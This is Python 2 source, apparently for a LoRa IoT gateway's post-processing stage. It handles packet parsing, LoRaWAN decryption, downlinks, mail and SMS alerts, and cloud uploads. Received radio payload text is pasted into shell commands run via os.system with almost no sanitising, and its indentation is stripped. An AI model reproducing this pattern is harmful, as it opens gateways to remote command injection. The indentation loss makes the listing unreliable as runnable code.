#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#low-level data prefix
#------------------------------------------------------------
LL_PREFIX_1='\xFF'
LL_PREFIX_LORA='\xFE'
#add here other data prefix for other type of low-level radio gateway
#list here other radio type
LORA_RADIO=1
#will be dynamically determined according to the second data prefix
radio_type=LORA_RADIO
#------------------------------------------------------------
#LoRa header packet information
#------------------------------------------------------------
HEADER_SIZE=4
APPKEY_SIZE=4
PKT_TYPE_DATA=0x10
PKT_TYPE_ACK=0x20
PKT_FLAG_ACK_REQ=0x08
PKT_FLAG_DATA_ENCRYPTED=0x04
PKT_FLAG_DATA_WAPPKEY=0x02
PKT_FLAG_DATA_DOWNLINK=0x01
LORAWAN_HEADER_SIZE=13
#------------------------------------------------------------
#last pkt information
#------------------------------------------------------------
pdata="0,0,0,0,0,0,0,0"
rdata="0,0,0"
tdata="N/A"
dst=0
ptype=0
ptypestr="N/A"
src=0
seq=0
datalen=0
SNR=0
RSSI=0
bw=0
cr=0
sf=0
_hasRadioData=False
#------------------------------------------------------------
#to display non printable characters
replchars = re.compile(r'[\x00-\x1f]')
def replchars_to_hex(match):
return r'\x{0:02x}'.format(ord(match.group()))
#------------------------------------------------------------
#will ignore lines beginning with '?'
#------------------------------------------------------------
_ignoreComment=1
#------------------------------------------------------------
#for appkey management
#------------------------------------------------------------
the_app_key = '\x00\x00\x00\x00'
#valid app key? by default we do not check for the app key
_validappkey=1
#------------------------------------------------------------
#for local AES decrypting
#------------------------------------------------------------
_hasClearData=0
#------------------------------------------------------------
#open gateway_conf.json file
#------------------------------------------------------------
f = open(os.path.expanduser("gateway_conf.json"),"r")
lines = f.readlines()
f.close()
array = ""
#get all the lines in a string
for line in lines :
array += line
#change it into a python array
json_array = json.loads(array)
#------------------------------------------------------------
#get gateway ID
#------------------------------------------------------------
#set the gateway_address for having different log filenames
_gwid = json_array["gateway_conf"]["gateway_ID"]
#------------------------------------------------------------
#raw format?
#------------------------------------------------------------
try:
_rawFormat = json_array["gateway_conf"]["raw"]
except KeyError:
_rawFormat = 0
if _rawFormat:
print "raw output from low-level gateway. post_processing_gw will handle packet format"
#------------------------------------------------------------
#local aes?
#------------------------------------------------------------
try:
_local_aes = json_array["gateway_conf"]["aes"]
except KeyError:
_local_aes = 0
if _local_aes:
print "enable local AES decryption"
#------------------------------------------------------------
#with app key?
#------------------------------------------------------------
try:
_wappkey = json_array["gateway_conf"]["wappkey"]
except KeyError:
_wappkey = 0
if _wappkey:
print "will enforce app key"
print "importing list of app key"
try:
import key_AppKey
except ImportError:
print "no key_AppKey.py file"
_wappkey = 0
#------------------------------------------------------------
#initialize gateway DHT22 sensor
#------------------------------------------------------------
try:
_gw_dht22 = json_array["gateway_conf"]["dht22"]
except KeyError:
_gw_dht22 = 0
if _gw_dht22 < 0:
_gw_dht22 = 0
_date_save_dht22 = None
try:
_dht22_mongo = json_array["gateway_conf"]["dht22_mongo"]
except KeyError:
_dht22_mongo = False
if (_dht22_mongo):
global add_document
from MongoDB import add_document
if (_gw_dht22):
print "Use DHT22 to get gateway temperature and humidity level"
#read values from dht22 in the gateway box
sys.path.insert(0, os.path.expanduser('./sensors_in_raspi/dht22'))
from read_dht22 import get_dht22_values
_temperature = 0
_humidity = 0
# retrieve dht22 values
def save_dht22_values():
global _temperature, _humidity, _date_save_dht22
_humidity, _temperature = get_dht22_values()
_date_save_dht22 = datetime.datetime.now()
print "Gateway TC : "+_temperature+" C | HU : "+_humidity+" % at "+str(_date_save_dht22)
#save values from the gateway box's DHT22 sensor, if _mongodb is true
if(_dht22_mongo):
#saving data in a JSON var
str_json_data = "{\"th\":"+_temperature+", \"hu\":"+_humidity+"}"
#creating document to add
doc = {
"type" : "DATA_GW_DHT22",
"gateway_eui" : _gwid,
"node_eui" : "gw",
"snr" : "",
"rssi" : "",
"cr" : "",
"datarate" : "",
"time" : _date_save_dht22,
"data" : json.dumps(json.loads(str_json_data))
}
#adding the document
add_document(doc)
def dht22_target():
while True:
print "Getting gateway temperature"
save_dht22_values()
sys.stdout.flush()
global _gw_dht22
time.sleep(_gw_dht22)
#------------------------------------------------------------
#copy post-processing.log into /var/www/html/admin/log folder
#------------------------------------------------------------
#you can enable periodic copy of post-processing.log file by setting to True
#but you need to install the web admin interface in order to have the /var/www/html/admin/log/ folder
#note that this feature is obsoleted by an option in the web admin interface to copy post-processing.log file on demand
_gw_copy_post_processing=False
#TODO: integrate copy post_processing feature into periodic status/tasks?
def copy_post_processing():
print "extract last 500 lines of post-processing.log into /var/www/html/admin/log/post-processing-500L.log"
cmd="sudo tail -n 500 log/post-processing.log > /var/www/html/admin/log/post-processing-500L.log"
try:
os.system(cmd)
except:
print "Error when extracting lines from post-processing_"+_gwid+".log"
cmd="sudo chown -R pi:www-data /var/www/html/admin/log"
try:
os.system(cmd)
except:
print "Error when setting file ownership to pi:www-data"
def copy_post_processing_target():
while True:
copy_post_processing()
sys.stdout.flush()
#change here if you want to change the time between 2 extraction
#here it is 30mins
time.sleep(1800)
#------------------------------------------------------------
#for downlink features
#------------------------------------------------------------
try:
_gw_downlink = json_array["gateway_conf"]["downlink"]
except KeyError:
_gw_downlink = 0
if _gw_downlink < 0:
_gw_downlink = 0
_post_downlink_file = "downlink/downlink-post.txt"
_post_downlink_queued_file = "downlink/downlink-post-queued.txt"
_gw_downlink_file = "downlink/downlink.txt"
pending_downlink_requests = []
#actually, periodic output for downlink may be not very convenient
#as typical value for checking downlink is 1 to 5 minutes
#so we disable it here
_verbose_downlink=False
#if we check every hour, then switch output on
#you can also disable this behavior
if _gw_downlink > 3600:
_verbose_downlink=True
def check_downlink():
# - post_processing_gw.py checks and uses downlink/downlink_post.txt as input
# - post_processing_gw.py will maintain a list of downlink message requests by reading downlink/downlink_post.txt
# - valid requests will be appended to downlink/downlink-post_queued.txt
# - after reading downlink/downlink_post.txt, post_processing_gw.py deletes it
# - when a packet from device i is processed by post_processing_gw.py, it will check whether there is a queued message for i
# - if yes, then it generates a downlink/downlink.txt file with the queue message as content
if _verbose_downlink:
print datetime.datetime.now()
print "post downlink: checking for "+_post_downlink_file
if os.path.isfile(os.path.expanduser(_post_downlink_file)):
lines = []
print "post downlink: reading "+_post_downlink_file
f = open(os.path.expanduser(_post_downlink_file),"r")
lines = f.readlines()
f.close()
for line in lines:
#remove \r=0xOD from line if some are inserted by OS and various tools
line = line.replace('\r','')
if len(line) > 1 or line != '\n':
line_json=json.loads(line)
print line_json
if line_json["status"]=="send_request":
pending_downlink_requests.append(line)
#print pending_downlink_request
print "post downlink: writing to "+_post_downlink_queued_file
f = open(os.path.expanduser(_post_downlink_queued_file),"w")
for downlink_request in pending_downlink_requests:
f.write("%s" % downlink_request)
os.remove(os.path.expanduser(_post_downlink_file))
else:
if _verbose_downlink:
print "post downlink: no downlink requests"
if _verbose_downlink:
print "post downlink: list of pending downlink requests"
if len(pending_downlink_requests) == 0:
print "None"
else:
for downlink_request in pending_downlink_requests:
print downlink_request.replace('\n','')
def downlink_target():
while True:
check_downlink()
sys.stdout.flush()
global _gw_downlink
time.sleep(_gw_downlink)
#------------------------------------------------------------
#for doing periodic status/tasks
#------------------------------------------------------------
try:
_gw_status = json_array["gateway_conf"]["status"]
except KeyError:
_gw_status = 0
if _gw_status < 0:
_gw_status = 0
# if _gw_status:
# try:
# _gw_lat = json_array["gateway_conf"]["ref_latitude"]
# except KeyError:
# _gw_lat = "undef"
# try:
# _gw_long = json_array["gateway_conf"]["ref_longitude"]
# except KeyError:
# _gw_long = "undef"
def status_target():
while True:
print datetime.datetime.now()
print 'post status: gw ON'
if _gw_downlink:
print 'post status: will check for downlink requests every %d seconds' % _gw_downlink
print 'post status: executing periodic tasks'
sys.stdout.flush()
try:
os.system('python post_status_processing_gw.py')
except:
print "Error when executing post_status_processing_gw.py"
global _gw_status
time.sleep(_gw_status)
#------------------------------------------------------------
#check Internet connectivity
#------------------------------------------------------------
def checkNet():
print "post_processing_gw.py checks Internet connecitivity with www.google.com"
try:
response = requests.get("http://www.google.com")
print "response code: " + str(response.status_code)
return True
except requests.ConnectionError:
print "No Internet"
return False
#------------------------------------------------------------
#check for alert_conf.json section
#------------------------------------------------------------
try:
alert_conf=json_array["alert_conf"]
_has_alert_conf = True
print "post_processing_gw.py found an alert_conf section"
except KeyError:
_has_alert_conf = False
#------------------------------------------------------------
#for mail alerting
#------------------------------------------------------------
#got example from https://myhydropi.com/send-email-with-a-raspberry-pi-and-python
_use_mail_alert = False
if _has_alert_conf:
#global _use_mail_alert
_use_mail_alert = json_array["alert_conf"]["use_mail"]
if _use_mail_alert:
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
print "Alert by mail is ON. Contact mail is "+json_array["alert_conf"]["contact_mail"]
def send_alert_mail(m):
fromaddr = json_array["alert_conf"]["mail_from"]
toaddr = json_array["alert_conf"]["contact_mail"]
#in case we have several contact mail separated by ','
alladdr=toaddr.split(",")
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = m
body = m
msg.attach(MIMEText(body, 'plain'))
server = smtplib.SMTP(json_array["alert_conf"]["mail_server"], 587)
server.starttls()
server.login(fromaddr, json_array["alert_conf"]["mail_passwd"])
text = msg.as_string()
server.sendmail(fromaddr, alladdr, text)
server.quit()
if _use_mail_alert :
print "post_processing_gw.py sends mail indicating that gateway has started post-processing stage..."
if checkNet():
try:
send_alert_mail("Gateway "+_gwid+" has started post-processing stage")
print "Sending mail done"
except:
print "Unexpected error when sending mail"
sys.stdout.flush()
#------------------------------------------------------------
#for SMS alerting
#------------------------------------------------------------
_use_sms_alert = False
if _has_alert_conf:
#global _use_sms_alert
_use_sms_alert = json_array["alert_conf"]["use_sms"]
global PIN, contact_sms, gammurc_file, sm
if _use_sms_alert:
#check Gammu configuration
if (not libSMS.gammuCheck()):
print "overriding use_sms to false"
_use_sms_alert = False
if _use_sms_alert:
PIN = json_array["alert_conf"]["pin"]
contact_sms = json_array["alert_conf"]["contact_sms"]
gammurc_file = json_array["alert_conf"]["gammurc_file"]
if (libSMS.gammurcCheck(gammurc_file)):
print "Alert by SMS is ON. Contact SMS is ",
print contact_sms
print "Initializing gammu for SMS"
else:
print "overriding use_sms to false"
_use_sms_alert = False
if _use_sms_alert:
if (libSMS.phoneConnection(gammurc_file, PIN) == None):
print "overriding use_sms to false"
print "Sending SMS failed"
_use_sms_alert = False
else:
sm = libSMS.phoneConnection(gammurc_file, PIN)
if _use_sms_alert :
print "post_processing_gw.py sends SMS indicating that gateway has started post-processing stage..."
success = libSMS.send_sms(sm, "Gateway "+_gwid+" has started post-processing stage", contact_sms)
if (success):
print "Sending SMS done"
sys.stdout.flush()
#------------------------------------------------------------
#for handling images
#------------------------------------------------------------
#list of active nodes
nodeL = deque([])
#association to get the file handler
fileH = {}
#association to get the image filename
imageFilenameA = {}
#association to get the image SN
imgsnA= {}
#association to get the image quality factor
qualityA = {}
#association to get the cam id
camidA = {}
#global image seq number
imgSN=0
def image_timeout():
#get the node which timer has expired first
#i.e. the one that received image packet earlier
node_id=nodeL.popleft()
print "close image file for node %d" % node_id
f=fileH[node_id]
f.close()
del fileH[node_id]
print "decoding image "+os.path.expanduser(imageFilenameA[node_id])
sys.stdout.flush()
cmd = '/home/pi/lora_gateway/ucam-images/decode_to_bmp -received '+os.path.expanduser(imageFilenameA[node_id])+\
' -SN '+str(imgsnA[node_id])+\
' -src '+str(node_id)+\
' -camid '+str(camidA[node_id])+\
' -Q '+str(qualityA[node_id])+\
' -vflip'+\
' /home/pi/lora_gateway/ucam-images/128x128-test.bmp'
print "decoding with command"
print cmd
args = cmd.split()
out = 'error'
try:
out = subprocess.check_output(args, stderr=None, shell=False)
if (out=='error'):
print "decoding error"
else:
# leave enough time for the decoding program to terminate
time.sleep(3)
out = out.replace('\r','')
out = out.replace('\n','')
print "producing file " + out
print "creating if needed the uploads/node_"+str(node_id)+" folder"
try:
os.mkdir(os.path.expanduser(_web_folder_path+"images/uploads/node_"+str(node_id)))
except OSError:
print "folder already exist"
print "moving decoded image file into " + os.path.expanduser(_web_folder_path+"images/uploads/node_"+str(node_id))
os.rename(os.path.expanduser("./"+out), os.path.expanduser(_web_folder_path+"images/uploads/node_"+str(node_id)+"/"+out))
print "done"
except subprocess.CalledProcessError:
print "launching image decoding failed!"
sys.stdout.flush()
#------------------------------------------------------------
#for managing the input data when we can have aes encryption
#------------------------------------------------------------
_linebuf="the line buffer"
_linebuf_idx=0
_has_linebuf=0
def getSingleChar():
global _has_linebuf
#if we have a valid _linebuf then read from _linebuf
if _has_linebuf==1:
global _linebuf_idx
global _linebuf
if _linebuf_idx < len(_linebuf):
_linebuf_idx = _linebuf_idx + 1
return _linebuf[_linebuf_idx-1]
else:
#no more character from _linebuf, so read from stdin
_has_linebuf = 0
return sys.stdin.read(1)
else:
return sys.stdin.read(1)
def getAllLine():
global _linebuf_idx
p=_linebuf_idx
_linebuf_idx = 0
global _has_linebuf
_has_linebuf = 0
global _linebuf
#return the remaining of the string and clear the _linebuf
return _linebuf[p:]
def fillLinebuf(n):
global _linebuf_idx
_linebuf_idx = 0
global _has_linebuf
_has_linebuf = 1
global _linebuf
#fill in our _linebuf from stdin
_linebuf=sys.stdin.read(n)
#////////////////////////////////////////////////////////////
# CHANGE HERE THE VARIOUS PATHS FOR YOUR LOG FILES
#////////////////////////////////////////////////////////////
_folder_path = "/home/pi/Dropbox/LoRa-test/"
_web_folder_path = "/var/www/html/"
_telemetrylog_filename = _folder_path+"telemetry_"+str(_gwid)+".log"
_imagelog_filename = _folder_path+"image_"+str(_gwid)+".log"
# END
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#open clouds.json file to get enabled clouds
#------------------------------------------------------------
from clouds_parser import retrieve_enabled_clouds
#get a copy of the list of enabled clouds
_enabled_clouds=retrieve_enabled_clouds()
print "post_processing_gw.py got cloud list: "
print _enabled_clouds
#------------------------------------------------------------
#open clouds.json file to get clouds for encrypted data
#------------------------------------------------------------
_cloud_for_encrypted_data=retrieve_enabled_clouds("encrypted_clouds")
print "post_processing_gw.py got encrypted cloud list: "
print _cloud_for_encrypted_data
_cloud_for_lorawan_encrypted_data=retrieve_enabled_clouds("lorawan_encrypted_clouds")
print "post_processing_gw.py got LoRaWAN encrypted cloud list: "
print _cloud_for_lorawan_encrypted_data
#------------------------------------------------------------
#start various threads
#------------------------------------------------------------
#gateway dht22
if (_gw_dht22):
print "Starting thread to measure gateway temperature"
sys.stdout.flush()
t_dht22 = threading.Thread(target=dht22_target)
t_dht22.daemon = True
t_dht22.start()
#downlink feature
if (_gw_downlink):
#check for an existing downlink-post-queued.txt file
#
print datetime.datetime.now()
print "post downlink: checking for existing "+_post_downlink_queued_file
if os.path.isfile(os.path.expanduser(_post_downlink_queued_file)):
lines = []
print "post downlink: reading existing "+_post_downlink_queued_file
f = open(os.path.expanduser(_post_downlink_queued_file),"r")
lines = f.readlines()
f.close()
for line in lines:
if len(line) > 1 or line != '\n':
line_json=json.loads(line)
#print line_json
if line_json["status"]=="send_request":
pending_downlink_requests.append(line)
print "post downlink: start with current list of pending downlink requests"
for downlink_request in pending_downlink_requests:
print downlink_request.replace('\n','')
else:
print "post downlink: none existing downlink-post-queued.txt"
print "Loading lib to compute downlink MIC"
from loraWAN import loraWAN_get_MIC
print "Starting thread to check for downlink requests every %d seconds" % _gw_downlink
sys.stdout.flush()
t_downlink = threading.Thread(target=downlink_target)
t_downlink.daemon = True
t_downlink.start()
time.sleep(1)
#status feature
if (_gw_status):
print "Starting thread to perform periodic gw status/tasks"
sys.stdout.flush()
t_status = threading.Thread(target=status_target)
t_status.daemon = True
t_status.start()
time.sleep(1)
#copy post_processing feature
#TODO: integrate copy post_processing feature into periodic status/tasks?
if (_gw_copy_post_processing):
print "Starting thread to copy post_processing.log"
sys.stdout.flush()
t_status = threading.Thread(target=copy_post_processing_target)
t_status.daemon = True
t_status.start()
time.sleep(1)
print ''
print "Current working directory: "+os.getcwd()
#------------------------------------------------------------
#main loop
#------------------------------------------------------------
while True:
sys.stdout.flush()
ch = getSingleChar()
#expected prefixes
# ^p indicates a ctrl pkt info ^pdst(%d),ptype(%d),src(%d),seq(%d),len(%d),SNR(%d),RSSI=(%d) for the last received packet
# example: ^p1,16,3,0,234,8,-45
#
# ^r indicate a ctrl radio info ^rbw,cr,sf for the last received packet
# example: ^r500,5,12
#
# ^$ indicates an output (debug or log purposes) from the gateway that should be logged in the (Dropbox) gateway.log file
# example: ^$Set LoRa mode 4
#
# ^l indicates a ctrl LAS info ^lsrc(%d),type(%d)
# type is 1 for DSP_REG, 2 for DSP_INIT, 3 for DSP_UPDT, 4 for DSP_DATA
# example: ^l3,4
#
# \$ indicates a message that should be logged in the (Dropbox) telemetry.log file
# example: \$hello -> hello will be logged in the following format
# (src=3 seq=0 len=6 SNR=8 RSSI=-54) 2015-10-16T14:47:44.072230> hello
#
#
# \! indicates a message that should be logged on a cloud, see clouds.json
#
# example for a ThingSpeak channel as implemented in CloudThinkSpeak.py
# \!SGSH52UGPVAUYG3S#9.4 -> 9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at default field, i.e. field 1
# \!2#9.4 -> 9.4 will be logged in the default channel at field 2
# \!SGSH52UGPVAUYG3S#2#9.4 -> 9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at field 2
# \!##9.4 or \!9.4 -> will be logged in default channel and field
#
# you can add nomemclature codes:
# \!##TC/9.4/HU/85/DO/7 -> with ThingSpeak you can either upload only the first value or all values on several fields
# -> with an IoT cloud such as Grovestreams you will be able to store both nomenclatures and values
#
# you can log other information such as src, seq, len, SNR and RSSI on specific fields
#
# \xFF\xFE indicates radio data prefix
#
# \xFF\x50-\x54 indicates an image packet. Next fields are src_addr(2B), seq(1B), Q(1B), size(1B)
# cam id is coded with the second framing byte: i.e. \x50 means cam id = 0
#
#------------------------------------------------------------
# '^' is reserved for control information from the gateway
#------------------------------------------------------------
if (ch=='^'):
now = datetime.datetime.now()
ch=sys.stdin.read(1)
if (ch=='p'):
pdata = sys.stdin.readline()
print now.isoformat()
print "rcv ctrl pkt info (^p): "+pdata,
arr = map(int,pdata.split(','))
print "splitted in: ",
print arr
dst=arr[0]
ptype=arr[1]
ptypestr="N/A"
if ((ptype & 0xF0)==PKT_TYPE_DATA):
ptypestr="DATA"
if (ptype & PKT_FLAG_DATA_DOWNLINK)==PKT_FLAG_DATA_DOWNLINK:
ptypestr = ptypestr + " DOWNLINK"
if (ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY:
ptypestr = ptypestr + " WAPPKEY"
if (ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED:
ptypestr = ptypestr + " ENCRYPTED"
if (ptype & PKT_FLAG_ACK_REQ)==PKT_FLAG_ACK_REQ:
ptypestr = ptypestr + " ACK_REQ"
if ((ptype & 0xF0)==PKT_TYPE_ACK):
ptypestr="ACK"
src=arr[2]
seq=arr[3]
datalen=arr[4]
SNR=arr[5]
RSSI=arr[6]
if (_rawFormat==0):
info_str="(dst=%d type=0x%.2X(%s) src=%d seq=%d len=%d SNR=%d RSSI=%d)" % (dst,ptype,ptypestr,src,seq,datalen,SNR,RSSI)
else:
info_str="rawFormat(len=%d SNR=%d RSSI=%d)" % (datalen,SNR,RSSI)
print info_str
#TODO: maintain statistics from received messages and periodically add these informations in the gateway.log file
#here we check for pending downlink message that need to be sent back to the end-device
#
for downlink_request in pending_downlink_requests:
request_json=json.loads(downlink_request)
if (request_json["dst"]==0) or (src == request_json["dst"]):
print "post downlink: receive from %d with pending request" % src
if (request_json["dst"]==0):
print "in broadcast mode"
else:
print "in unicast mode"
print "post downlink: downlink data is \"%s\"" % request_json["data"]
print "post downlink: generate "+_gw_downlink_file+" from entry"
print downlink_request.replace('\n','')
#generate the MIC corresponding to the clear data and the destination device address
#it is possible to have a broadcast address but since the only device that is listening
#is the one that has sent a packet, there is little interest in doing so
#so currently, we use the sending device's address to compute the MIC
MIC=loraWAN_get_MIC(src,request_json["data"])
#add the 4 byte MIC information into the json line
request_json['MIC0']=hex(MIC[0])
request_json['MIC1']=hex(MIC[1])
request_json['MIC2']=hex(MIC[2])
request_json['MIC3']=hex(MIC[3])
downlink_json=[]
downlink_json.append(request_json)
f = open(os.path.expanduser(_gw_downlink_file),"a")
print "post downlink: write"
for downlink_json_line in downlink_json:
#print downlink_json_line
print json.dumps(downlink_json_line)
f.write(json.dumps(downlink_json_line)+'\n')
f.close()
pending_downlink_requests.remove(downlink_request)
#update downlink-post-queued.txt
f = open(os.path.expanduser(_post_downlink_queued_file),"w")
for downlink_request in pending_downlink_requests:
f.write("%s" % downlink_request)
#TODO: should we write all pending request for this node
#or only the first one that we found?
#currently, we do only the first one
break;
if (ch=='r'):
rdata = sys.stdin.readline()
print "rcv ctrl radio info (^r): "+rdata,
arr = map(int,rdata.split(','))
print "splitted in: ",
print arr
bw=arr[0]
cr=arr[1]
sf=arr[2]
info_str="(BW=%d CR=%d SF=%d)" % (bw,cr,sf)
print info_str
if (ch=='t'):
tdata = sys.stdin.readline()
print "rcv timestamp (^t): "+tdata
if (ch=='l'):
#TODO: LAS service
print "not implemented yet"
if (ch=='$'):
data = sys.stdin.readline()
print data,
#when the low-level gateway program reset the radio module then it is will send "^$Resetting the radio module"
if 'Resetting' in data:
if _use_mail_alert:
print "post_processing_gw.py sends mail indicating that gateway has reset radio module..."
if checkNet():
send_alert_mail("Gateway "+_gwid+" has reset its radio module")
print "Sending mail done"
if _use_sms_alert:
print "post_processing_gw.py sends SMS indicating that gateway has reset radio module..."
success = libSMS.send_sms(sm, "Gateway "+_gwid+" has reset its radio module", contact_sms)
if (success):
print "Sending SMS done"
continue
#------------------------------------------------------------
# '\' is reserved for message logging service
#------------------------------------------------------------
if (ch=='\\' and _hasRadioData==True):
_hasRadioData=False
now = datetime.datetime.now()
if _validappkey==1:
print "valid app key: accept data"
ch=getSingleChar()
if (ch=='$'): #log in a file
data = getAllLine()
print "rcv msg to log (\$) in log file: "+data,
f=open(os.path.expanduser(_telemetrylog_filename),"a")
f.write(info_str+' ')
f.write(now.isoformat()+'> ')
f.write(data)
f.close()
#/////////////////////////////////////////////////////////////
# YOU CAN MODIFY HERE HOW YOU WANT DATA TO BE PUSHED TO CLOUDS
# WE PROVIDE EXAMPLES FOR THINGSPEAK, GROVESTREAM
# IT IS ADVISED TO USE A SEPERATE PYTHON SCRIPT PER CLOUD
#////////////////////////////////////////////////////////////
#log on clouds: thingspeak, grovestreams, sensorcloud,...
#or even on MongoDB as it is declared as a regular cloud
#enabled clouds must be declared in clouds.json
elif (ch=='!'):
ldata = getAllLine()
if (dateutil_tz==True):
#replacing tdata to get time zone information when uploading to clouds
localdt = datetime.datetime.now(dateutil.tz.tzlocal())
tdata = localdt.replace(microsecond=0).isoformat()
print "number of enabled clouds is %d" % len(_enabled_clouds)
#loop over all enabled clouds to upload data
#once again, it is up to the corresponding cloud script to handle the data format
#
for cloud_index in range(0,len(_enabled_clouds)):
try:
print "--> cloud[%d]" % cloud_index
cloud_script=_enabled_clouds[cloud_index]
print "uploading with "+cloud_script
sys.stdout.flush()
cmd_arg=cloud_script+" \""+ldata.replace('\n','').replace('\0','')+"\""+" \""+pdata.replace('\n','')+"\""+" \""+rdata.replace('\n','')+"\""+" \""+tdata.replace('\n','')+"\""+" \""+_gwid.replace('\n','')+"\""
except UnicodeDecodeError, ude:
print ude
else:
print cmd_arg
sys.stdout.flush()
try:
os.system(cmd_arg)
except:
print "Error when uploading data to the cloud"
print "--> cloud end"
#END
#////////////////////////////////////////////////////////////
else:
#not a known data logging prefix
#you may want to upload to a default service
#so just implement it here
print "unrecognized data logging prefix: discard data"
getAllLine()
else:
print "invalid app key: discard data"
getAllLine()
continue
#handle low-level gateway data
if (ch == LL_PREFIX_1):
print "got first framing byte"
ch=getSingleChar()
#data from low-level LoRa gateway?
if (ch == LL_PREFIX_LORA):
#the data prefix is inserted by the gateway
#do not modify, unless you know what you are doing and that you modify lora_gateway (comment WITH_DATA_PREFIX)
print "--> got LoRa data prefix"
radio_type=LORA_RADIO
#if SNR < -20:
# print "--> SNR too low, discarding data"
# sys.stdin.readline()
# continue
_hasRadioData=True
#we actually need to use DATA_PREFIX in order to differentiate data from radio coming to the post-processing stage
#if _wappkey is set then we have to first indicate that _validappkey=0
if (_wappkey==1):
_validappkey=0
else:
_validappkey=1
#if we have raw output from gw, then try to determine which kind of packet it is
#
if (_rawFormat==1):
print "raw format from LoRa gateway"
ch=getSingleChar()
#probably our modified Libelium header where the destination (i.e. 1) is the gateway
#dissect our modified Libelium format
if ord(ch)==1:
dst=ord(ch)
ptype=ord(getSingleChar())
src=ord(getSingleChar())
seq=ord(getSingleChar())
print "Header[dst=%d ptype=0x%.2X src=%d seq=%d]" % (dst,ptype,src,seq)
#now we read datalen-4 (the header length) bytes in our line buffer
fillLinebuf(datalen-HEADER_SIZE)
datalen=datalen-HEADER_SIZE
pdata="%d,%d,%d,%d,%d,%d,%d" % (dst,ptype,src,seq,datalen,SNR,RSSI)
print "update ctrl pkt info (^p): "+pdata
#LoRaWAN uses the MHDR(1B)
#----------------------------
#| 7 6 5 | 4 3 2 | 1 0 |
#----------------------------
# 0 1 0 0 0 0 0 0 unconfirmed data up
# 1 0 0 0 0 0 0 0 confirmed data up
# MType RFU major
#
#the main MType is unconfirmed data up b010 or confirmed data up b100
#and packet format is as follows, payload starts at byte 9
#MHDR[1] | DevAddr[4] | FCtrl[1] | FCnt[2] | FPort[1] | EncryptedPayload | MIC[4]
if ord(ch) & 0x40 == 0x40 or ord(ch) & 0x80 == 0x80:
#Do the LoRaWAN decoding
print "LoRaWAN?"
fillLinebuf(datalen-1)
lorapktstr=ch+getAllLine()
lorapkt=[]
for i in range (0,len(lorapktstr)):
lorapkt.append(ord(lorapktstr[i]))
#you can uncomment/comment this display if you want
print [hex(x) for x in lorapkt]
datalen=datalen-LORAWAN_HEADER_SIZE
src = lorapkt[4]*256*256*256
src += lorapkt[3]*256*256
src += lorapkt[2]*256
src += lorapkt[1]
seq=lorapkt[7]*256+lorapkt[6]
#just to print the src in 0x01020304 form
pdata="%d,%d,%s,%d,%d,%d,%d" % (256,ord(ch),"0x%0.8X" % src,seq,datalen,SNR,RSSI)
print "update ctrl pkt info (^p): "+pdata
#internally, we convert in int
pdata="%d,%d,%d,%d,%d,%d,%d" % (256,ord(ch),src,seq,datalen,SNR,RSSI)
if _local_aes==1:
from loraWAN import loraWAN_process_pkt
try:
plain_payload=loraWAN_process_pkt(lorapkt)
except:
print "### unexpected decryption error ###"
plain_payload="###BADMIC###"
if plain_payload=="###BADMIC###":
print plain_payload
else:
print "plain payload is : ",
print(replchars.sub(replchars_to_hex, plain_payload))
#if ((ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY):
# the_app_key = plain_payload[0]
# the_app_key = the_app_key + plain_payload[1]
# the_app_key = the_app_key + plain_payload[2]
# the_app_key = the_app_key + plain_payload[3]
# print " ".join("0x{:02x}".format(ord(c)) for c in the_app_key),
# print plain_payload[APPKEY_SIZE:]
#else:
# print plain_payload
_linebuf = plain_payload
_has_linebuf=1
_hasClearData=1
else:
print "--> DATA encrypted: local aes not activated"
lorapktstr_b64=base64.b64encode(lorapktstr)
print "--> FYI base64 of LoRaWAN frame w/MIC: "+lorapktstr_b64
print "--> number of enabled clouds is %d" % len(_cloud_for_lorawan_encrypted_data)
if len(_cloud_for_lorawan_encrypted_data)==0:
print "--> discard encrypted data"
else:
#loop over all enabled clouds to upload data
#once again, it is up to the corresponding cloud script to handle the data format
#
for cloud_index in range(0,len(_cloud_for_lorawan_encrypted_data)):
try:
print "--> LoRaWAN encrypted cloud[%d]" % cloud_index
cloud_script=_cloud_for_lorawan_encrypted_data[cloud_index]
print "uploading with "+cloud_script
sys.stdout.flush()
cmd_arg=cloud_script+" \""+lorapktstr_b64.replace('\n','')+"\""+" \""+pdata.replace('\n','')+"\""+" \""+rdata.replace('\n','')+"\""+" \""+tdata.replace('\n','')+"\""+" \""+_gwid.replace('\n','')+"\""
except UnicodeDecodeError, ude:
print ude
else:
print cmd_arg
sys.stdout.flush()
try:
os.system(cmd_arg)
except:
print "Error when uploading data to LoRaWAN encrypted cloud"
print "--> LoRaWAN encrypted cloud end"
continue
else:
#now we read datalen bytes in our line buffer
fillLinebuf(datalen)
#encrypted data payload?
if ((ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED):
print "--> DATA encrypted: encrypted payload size is %d" % datalen
_hasClearData=0
lorapktstr=getAllLine()
if _local_aes==1:
print "--> decrypting in AES-CTR mode (LoRaWAN version)"
lorapkt=[]
for i in range (0,len(lorapktstr)):
lorapkt.append(ord(lorapktstr[i]))
from loraWAN import loraWAN_process_pkt
try:
plain_payload=loraWAN_process_pkt(lorapkt)
except:
print "### unexpected decryption error ###"
plain_payload="###BADMIC###"
if plain_payload=="###BADMIC###":
print plain_payload
else:
print "plain payload is : ",
print(replchars.sub(replchars_to_hex, plain_payload))
#if ((ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY):
# the_app_key = plain_payload[0]
# the_app_key = the_app_key + plain_payload[1]
# the_app_key = the_app_key + plain_payload[2]
# the_app_key = the_app_key + plain_payload[3]
# print " ".join("0x{:02x}".format(ord(c)) for c in the_app_key),
# print plain_payload[APPKEY_SIZE:]
#else:
# print plain_payload
_linebuf = plain_payload
_has_linebuf=1
_hasClearData=1
#remove the data encrypted flag
ptype = ptype & (~PKT_FLAG_DATA_ENCRYPTED)
